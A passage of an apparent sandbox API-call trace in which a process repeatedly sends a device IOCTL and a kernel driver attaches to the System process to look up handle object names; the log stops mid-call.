[0240.717] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.717] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.717] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.717] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.717] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.717] PsAcquireProcessExitSynchronization () returned 0x0 [0240.717] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.717] ObReferenceObjectByHandle (in: Handle=0xffffffff80000544, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003aa5d90, HandleInformation=0x0) returned 0x0 [0240.717] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.717] PsReleaseProcessExitSynchronization () returned 0x2 [0240.717] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.717] ObQueryNameString (in: Object=0xfffffa8003aa5d90, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.717] ObfDereferenceObject (Object=0xfffffa8003aa5d90) returned 0x2 [0240.717] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.717] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.717] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.717] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0240.717] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.717] PsAcquireProcessExitSynchronization () returned 0x0 [0240.717] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.717] ObReferenceObjectByHandle (in: Handle=0xffffffff80000548, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800379ab60, HandleInformation=0x0) returned 0x0 [0240.717] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.718] PsReleaseProcessExitSynchronization () returned 0x2 [0240.718] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.718] ObQueryNameString (in: Object=0xfffffa800379ab60, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.718] ObfDereferenceObject (Object=0xfffffa800379ab60) returned 0x2 [0240.718] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.718] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.718] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.718] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.718] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.718] PsAcquireProcessExitSynchronization () returned 0x0 [0240.718] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.718] ObReferenceObjectByHandle (in: Handle=0xffffffff8000054c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003766050, HandleInformation=0x0) returned 0x0 [0240.718] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.718] PsReleaseProcessExitSynchronization () returned 0x2 [0240.718] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.718] ObQueryNameString (in: Object=0xfffffa8003766050, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.718] ObfDereferenceObject (Object=0xfffffa8003766050) returned 0x2 [0240.718] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.718] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.718] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.718] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.719] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.719] PsAcquireProcessExitSynchronization () returned 0x0 [0240.719] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.719] ObReferenceObjectByHandle (in: Handle=0xffffffff80000550, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002e125b0, HandleInformation=0x0) returned 0x0 [0240.719] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.719] PsReleaseProcessExitSynchronization () returned 0x2 [0240.719] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.719] ObQueryNameString (in: Object=0xfffffa8002e125b0, ObjectNameInfo=0xfffffa80030de7c4, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80030de7c4, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.719] ObfDereferenceObject (Object=0xfffffa8002e125b0) returned 0x2 [0240.719] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.719] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.719] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.719] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.719] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.719] PsAcquireProcessExitSynchronization () returned 0x0 [0240.719] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.719] ObReferenceObjectByHandle (in: Handle=0xffffffff80000554, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003a66220, HandleInformation=0x0) returned 0x0 [0240.719] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.719] PsReleaseProcessExitSynchronization () returned 0x2 [0240.719] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.719] ObQueryNameString (in: Object=0xfffffa8003a66220, ObjectNameInfo=0xfffffa8003085044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003085044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.719] ObfDereferenceObject (Object=0xfffffa8003a66220) returned 0x2 [0240.720] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.720] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.720] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.720] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0240.720] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.720] PsAcquireProcessExitSynchronization () returned 0x0 [0240.720] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.720] ObReferenceObjectByHandle (in: Handle=0xffffffff80000558, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f74d00, HandleInformation=0x0) returned 0x0 [0240.720] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.720] PsReleaseProcessExitSynchronization () returned 0x2 [0240.720] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.720] ObQueryNameString (in: Object=0xfffffa8001f74d00, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.720] ObfDereferenceObject (Object=0xfffffa8001f74d00) returned 0x2 [0240.720] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.720] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.720] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.720] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.720] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.720] PsAcquireProcessExitSynchronization () returned 0x0 [0240.720] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.720] ObReferenceObjectByHandle (in: Handle=0xffffffff8000055c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa80034ec050, HandleInformation=0x0) returned 0x0 [0240.720] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.721] PsReleaseProcessExitSynchronization () returned 0x2 [0240.721] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.721] ObQueryNameString (in: Object=0xfffffa80034ec050, ObjectNameInfo=0xfffffa800307b044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307b044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.721] ObfDereferenceObject (Object=0xfffffa80034ec050) returned 0x2 [0240.721] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.721] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.721] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.721] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x7e, lpOverlapped=0x0) returned 1 [0240.721] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.721] PsAcquireProcessExitSynchronization () returned 0x0 [0240.721] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.721] ObReferenceObjectByHandle (in: Handle=0xffffffff80000560, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f75050, HandleInformation=0x0) returned 0x0 [0240.721] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.721] PsReleaseProcessExitSynchronization () returned 0x2 [0240.721] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.794] ObQueryNameString (in: Object=0xfffffa8001f75050, ObjectNameInfo=0xfffffa8003122044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003122044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.794] ObfDereferenceObject (Object=0xfffffa8001f75050) returned 0x2 [0240.794] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.794] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.794] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.794] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.794] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.794] PsAcquireProcessExitSynchronization () returned 0x0 [0240.794] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.794] ObReferenceObjectByHandle (in: Handle=0xffffffff80000564, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8003aa3510, HandleInformation=0x0) returned 0x0 [0240.795] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.795] PsReleaseProcessExitSynchronization () returned 0x2 [0240.795] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.795] ObQueryNameString (in: Object=0xfffffa8003aa3510, ObjectNameInfo=0xfffffa800307d044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800307d044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.795] ObfDereferenceObject (Object=0xfffffa8003aa3510) returned 0x2 [0240.795] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.795] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.795] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.795] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.795] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.795] PsAcquireProcessExitSynchronization () returned 0x0 [0240.795] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.795] ObReferenceObjectByHandle (in: Handle=0xffffffff80000568, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800379af20, HandleInformation=0x0) returned 0x0 [0240.795] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.796] PsReleaseProcessExitSynchronization () returned 0x2 [0240.796] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.796] ObQueryNameString (in: Object=0xfffffa800379af20, ObjectNameInfo=0xfffffa8003087044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003087044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.796] ObfDereferenceObject (Object=0xfffffa800379af20) returned 0x2 [0240.796] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.796] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.796] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.796] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.796] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.796] PsAcquireProcessExitSynchronization () returned 0x0 [0240.796] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.796] ObReferenceObjectByHandle (in: Handle=0xffffffff8000056c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001ecfa90, HandleInformation=0x0) returned 0x0 [0240.796] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.796] PsReleaseProcessExitSynchronization () returned 0x2 [0240.796] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.796] ObQueryNameString (in: Object=0xfffffa8001ecfa90, ObjectNameInfo=0xfffffa8003073044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003073044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.797] ObfDereferenceObject (Object=0xfffffa8001ecfa90) returned 0x2 [0240.797] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.797] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.797] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.797] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.797] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.797] PsAcquireProcessExitSynchronization () returned 0x0 [0240.797] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.797] ObReferenceObjectByHandle (in: Handle=0xffffffff800005b4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa800bb87f20, HandleInformation=0x0) returned 0x0 [0240.797] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.797] PsReleaseProcessExitSynchronization () returned 0x2 [0240.797] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.797] ObQueryNameString (in: Object=0xfffffa800bb87f20, ObjectNameInfo=0xfffffa8003066044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003066044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.797] ObfDereferenceObject (Object=0xfffffa800bb87f20) returned 0x2 [0240.797] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.798] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.798] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.798] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.798] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.798] PsAcquireProcessExitSynchronization () returned 0x0 [0240.798] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.798] ObReferenceObjectByHandle (in: Handle=0xffffffff800005c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001ed4400, HandleInformation=0x0) returned 0x0 [0240.798] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.798] PsReleaseProcessExitSynchronization () returned 0x2 [0240.798] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.798] ObQueryNameString (in: Object=0xfffffa8001ed4400, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.798] ObfDereferenceObject (Object=0xfffffa8001ed4400) returned 0x2 [0240.798] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.798] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.798] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.798] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0xce, lpOverlapped=0x0) returned 1 [0240.799] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.799] PsAcquireProcessExitSynchronization () returned 0x0 [0240.799] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.799] ObReferenceObjectByHandle (in: Handle=0xffffffff800005d0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8002152340, HandleInformation=0x0) returned 0x0 [0240.799] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.799] PsReleaseProcessExitSynchronization () returned 0x2 [0240.799] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.799] ObQueryNameString (in: Object=0xfffffa8002152340, ObjectNameInfo=0xfffffa800306f044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa800306f044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.799] ObfDereferenceObject (Object=0xfffffa8002152340) returned 0x2 [0240.799] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.799] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.799] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.799] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x1ea05e0, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x1ea05e0*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0240.799] PsLookupProcessByProcessId (in: ProcessId=0x4, Process=0xfffff880053c8558 | out: Process=0xfffff880053c8558) returned 0x0 [0240.799] PsAcquireProcessExitSynchronization () returned 0x0 [0240.799] KeStackAttachProcess (in: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0 | out: PROCESS=0xfffffa8001850990, ApcState=0xfffff880053c85d0) [0240.800] ObReferenceObjectByHandle (in: Handle=0xffffffff800005f8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80026b0b00, Object=0xfffff880053c8548, HandleInformation=0x0 | out: Object=0xfffff880053c8548*=0xfffffa8001f86550, HandleInformation=0x0) returned 0x0 [0240.800] KeUnstackDetachProcess (ApcState=0xfffff880053c85d0) [0240.800] PsReleaseProcessExitSynchronization () returned 0x2 [0240.800] ObfDereferenceObject (Object=0xfffffa8001850990) returned 0x7a [0240.800] ObQueryNameString (in: Object=0xfffffa8001f86550, ObjectNameInfo=0xfffffa8003071044, Length=0x800, ReturnLength=0xfffff880053c8550 | out: ObjectNameInfo=0xfffffa8003071044, ReturnLength=0xfffff880053c8550) returned 0x0 [0240.800] ObfDereferenceObject (Object=0xfffffa8001f86550) returned 0x2 [0240.800] IofCompleteRequest (Irp=0xfffffa80019e2540, PriorityBoost=0) [0240.800] HeapFree (in: hHeap=0x1b0000, dwFlags=0x0, lpMem=0x1ea05e0 | out: hHeap=0x1b0000) returned 1 [0240.800] RtlAllocateHeap (HeapHandle=0x1b0000, Flags=0x0, Size=0x808) returned 0x1ea05e0 [0240.800] DeviceIoControl (in: 